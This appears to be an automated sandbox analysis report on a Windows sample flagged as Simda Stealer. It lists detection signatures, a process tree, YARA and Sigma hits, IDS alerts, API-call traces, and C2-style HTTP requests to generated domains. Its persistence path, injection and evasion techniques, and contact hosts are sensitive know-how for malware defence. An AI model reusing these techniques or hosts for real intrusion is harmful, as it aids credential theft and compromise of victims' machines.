Windows Analysis Report
OjKmJJm2YT.exe

Overview

General Information

Sample name: OjKmJJm2YT.exe (renamed because original name is a hash value)
Original sample name: Virus.Hijack.ATA_virussign.com_ca30350fdb8b854abac0a08aa08ff89a.exe
Analysis ID: 1507240
MD5: ca30350fdb8b854abac0a08aa08ff89a
SHA1: 1204292ab1abc758ebfb9bf6d452b960eb6d977a
SHA256: b1242f3aa475d93a247673616478365f3a7f9fb1edbe8075372a09455521a57d

Detection

Simda Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OjKmJJm2YT.exe (PID: 1956 cmdline: "C:\Users\user\Desktop\OjKmJJm2YT.exe" MD5: CA30350FDB8B854ABAC0A08AA08FF89A)
    • svchost.exe (PID: 1512 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 3AFDB594A34F95485CA05A57DFEF80CC)
      • nFjEHtbDTFjy.exe (PID: 5368 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 6928 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 3816 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 4976 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 6472 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 3132 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 2316 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 7132 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 896 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 7144 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 5684 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 6424 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 6204 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 824 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 4612 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
0.2.OjKmJJm2YT.exe.406400.0.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
2.3.svchost.exe.37f0000.13.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.883000.0.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x4e260:$a1: name=%s&port=%u
  • 0x4d9f8:$a2: data_inject
  • 0x4dbe4:$a3: keylog.txt
  • 0x4d88d:$a4: User-agent: %s]]]
  • 0x4e3b4:$a5: %s\%02d.bmp
2.3.svchost.exe.37f0000.41.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
24.2.nFjEHtbDTFjy.exe.d92000.1.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\OjKmJJm2YT.exe, ProcessId: 1956, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1512, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
Source: Process started, Author: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-08T10:52:34.953925+0200 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49709 | TCP
2024-09-08T10:52:34.953983+0200 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.9 | 49710 | TCP
2024-09-08T10:52:35.347950+0200 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.9 | 49714 | TCP
2024-09-08T10:53:45.930055+0200 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.9 | 63310 | TCP
2024-09-08T10:52:34.953925+0200 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49709 | TCP
2024-09-08T10:52:34.953983+0200 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.9 | 49710 | TCP
2024-09-08T10:52:35.347950+0200 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.9 | 49714 | TCP
2024-09-08T10:53:45.930055+0200 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.9 | 63310 | TCP
2024-09-08T10:52:34.235689+0200 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.9 | 65460 | UDP

AV Detection

Source: OjKmJJm2YT.exe, Avira: detected
Source: C:\Windows\apppatch\svchost.exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\apppatch\svchost.exe, Joe Sandbox ML: detected
Source: OjKmJJm2YT.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Unpacked PE file: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Unpacked PE file: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Unpacked PE file: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Unpacked PE file: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Unpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exe, Unpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: OjKmJJm2YT.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49748 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57343 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57344 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57350 version: TLS 1.2
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nFjEHtbDTFjy.exe
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AD120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006B9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_006B9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_006BDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_006BDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AE6B0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00697680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_00697680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_014F9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014ED120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_014FDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_014FDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_014D7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014EE6B0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB

Networking

Source: Network traffic Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.9:65460
Source: Network traffic Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49718 -> 69.162.80.55:80
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.9:49710
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.9:49710
Source: C:\Windows\apppatch\svchost.exe HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
